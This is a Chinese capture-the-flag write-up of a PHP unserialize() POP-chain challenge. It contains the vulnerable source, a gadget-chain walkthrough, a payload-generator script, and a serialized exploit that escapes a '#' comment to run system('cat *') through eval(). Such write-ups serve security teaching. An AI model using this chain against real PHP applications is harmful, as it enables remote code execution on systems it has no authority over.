2022-DASCTF-ezpop分析

一道简单的php反序列化题目

源码分析

<?php  

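class crow
{
    // In eval(): a class *name* to instantiate. In the POP chain: the inner
    // `fin` gadget, whose missing world() method routes into fin::__call().
    public $v1;
    // Single constructor argument handed to the class named by $v1 in eval().
    // Left null by the chain payload.
    public $v2;

    /**
     * Instantiates the class named by $v1 with $v2 as its only constructor
     * argument and echoes the result (the created object must therefore be
     * string-convertible). Not used by the writeup's chain.
     *
     * NOTE(review): the writeup's listing reads `function eval({`, which does
     * not parse. Using `eval` as a *method* name is legal since PHP 7's
     * context-sensitive lexer, so the missing `)` is a transcription slip and
     * is restored here; nothing else about the method is changed.
     */
    public function eval()
    {
        echo new $this->v1($this->v2);
    }

    /**
     * Gadget: runs when a crow instance is called like a function, e.g.
     * `($this->m1)()` in mix::run(). Calls world() on $v1; when $v1 is an
     * object that has no world() method, PHP dispatches the call to that
     * object's __call() instead.
     */
    public function __invoke()
    {
        $this->v1->world();
    }
}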

class fin
{
    // Chain hop. For the outer fin a `what` object (so the concatenation in
    // __destruct triggers what::__toString); for the inner fin a `mix` object
    // (so __call reaches mix::get_flag).
    public $f1;

    /**
     * Chain entry point. Runs when the object is destroyed; the `.` operator
     * converts $f1 to a string, which invokes $f1->__toString() when $f1 is an
     * object defining one.
     */
    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    /**
     * Calls $f1 as a function; an object stored in $f1 is dispatched to its
     * __invoke(). Not used by the writeup's chain (mix::run plays this role).
     */
    public function run()
    {
        ($this->f1)();
    }

    /**
     * Gadget: receives any call to a method this class does not define
     * (crow::__invoke calls world()). The method name $a and argument list $b
     * are ignored; control is forwarded to $f1->get_flag().
     */
    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    // Chain hop: the `mix` object whose run() is called during string conversion.
    public $a;

    /**
     * Gadget: fires when this object is converted to a string (the `.`
     * concatenation in fin::__destruct). Calls run() on $a first, then returns
     * a fixed string so the conversion itself succeeds.
     */
    public function __toString()
    {
    $this->a->run();
        return 'hello';
    }
}
class mix
{
    // Outer mix: a `crow` object that run() calls as a function.
    // Inner mix: the string that get_flag() hands to eval().
    public $m1;

    /**
     * Gadget: calls $m1 as a function; an object in $m1 is dispatched to its
     * __invoke() (crow::__invoke in the chain).
     */
    public function run()
    {
        ($this->m1)();
    }

    /**
     * Sink: eval() over attacker-controlled data. The leading '#' opens a
     * single-line comment, which only extends to the end of the line, so an
     * $m1 that begins with "\n" places everything after the newline outside
     * the comment and it is executed as PHP.
     */
    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

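// Entry point.
// NOTE(review): the listing omits the `}` that closes the `if` block before
// `else` (a transcription error); restored here, behaviour otherwise unchanged.
// unserialize() on raw POST data is the intended vulnerability: any class
// declared in this file can be instantiated with attacker-chosen property
// values. The returned object is not assigned anywhere, so it is destroyed as
// soon as this statement finishes and its __destruct() runs immediately.
if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}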

源码中没有 __wakeup() 和 __construct()，可用的魔术方法只有 fin::__destruct()、what::__toString()、crow::__invoke() 和 fin::__call()。其中只有 __destruct() 不需要任何前置操作就会触发：unserialize($_POST['cmd']) 的返回值没有被任何变量接收，对象在该语句结束时引用计数归零、立即被销毁，所以反序列化后最先被调用的就是 fin 类的 __destruct() 方法。

构造POP

fin::__destruct()    # 对象被丢弃后立即触发；echo $this->f1 . '114514' 把 f1（what 对象）拼接成字符串，触发 what::__toString()

what::__toString() # 执行 $this->a->run()，a 为 mix 对象，进入 mix::run()；随后返回 'hello' 保证字符串转换本身不报错

mix::run() # ($this->m1)() 把 m1（注意是 m1，不是 f1）当作函数调用，m1 为 crow 对象时触发 crow::__invoke()

crow::__invoke() # $this->v1->world()，v1 为 fin 对象而 fin 没有 world() 方法，调用被转到 fin::__call()

fin::__call() # 方法名 $a 和参数 $b 都被忽略，直接调用 $this->f1->get_flag()，f1 为 mix 对象

mix::get_flag() # eval('#' . $this->m1)：'#' 是 PHP 的单行注释，只到行尾为止，所以 m1 以换行符 \n 开头即可让其后的代码脱离注释被执行

构造Payload

<?php

class crow
{
// Serialisation stub: the target class's methods are irrelevant to
// serialize(); what must match the server-side class is the class name and
// the public property names in declaration order (v1 before v2), since that
// order is what appears in the serialised string.
public $v1;
// Deliberately left null; serialised as `N;` and never read by the chain.
public $v2;

public function __construct($v1)
{
$this->v1 = $v1;
}
}

class fin
{
// Serialisation stub for the server-side `fin`: only the property name and
// value are needed, the gadget methods live on the target.
// Outer fin: holds the `what` object; inner fin: holds the `mix` object.
public $f1;

public function __construct($f1)
{
$this->f1 = $f1;
}
}

class what
{
// Serialisation stub for the server-side `what`; holds the `mix` object whose
// run() is called from what::__toString() on the target.
public $a;

public function __construct($a)
{
$this->a = $a;
}
}

class mix
{
// Serialisation stub for the server-side `mix`. Outer mix: the `crow` object
// called from run(); inner mix: the string that get_flag() passes to eval().
public $m1;

public function __construct($m1)
{
$this->m1 = $m1;
}
}

// Code for the eval() sink. The leading "\n" terminates the '#' line comment
// that mix::get_flag() prepends, so everything after it runs as PHP.
$cmd = "\nsystem('cat *');";

// Assemble the chain from the outside in:
//   fin::__destruct -> what::__toString -> mix::run -> crow::__invoke
//   -> fin::__call -> mix::get_flag -> eval
$chain = new fin(
    new what(
        new mix(
            new crow(
                new fin(
                    new mix($cmd)
                )
            )
        )
    )
);

// URL-encode so the serialised bytes survive being sent as the `cmd` POST field.
echo urlencode(serialize($chain));

输出

O%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A4%3A%22what%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A3%3A%22mix%22%3A1%3A%7Bs%3A2%3A%22m1%22%3BO%3A4%3A%22crow%22%3A2%3A%7Bs%3A2%3A%22v1%22%3BO%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A3%3A%22mix%22%3A1%3A%7Bs%3A2%3A%22m1%22%3Bs%3A17%3A%22%0Asystem%28%27cat+%2A%27%29%3B%22%3B%7D%7Ds%3A2%3A%22v2%22%3BN%3B%7D%7D%7D%7D

拿到flag

//flag{43282d76-6cb5-4e5c-9286-48e8688c6853}
not here, but it's close, think more.not here, but it's close, think more.not here, but it's close, think more.not here, but you are almost getting the flag!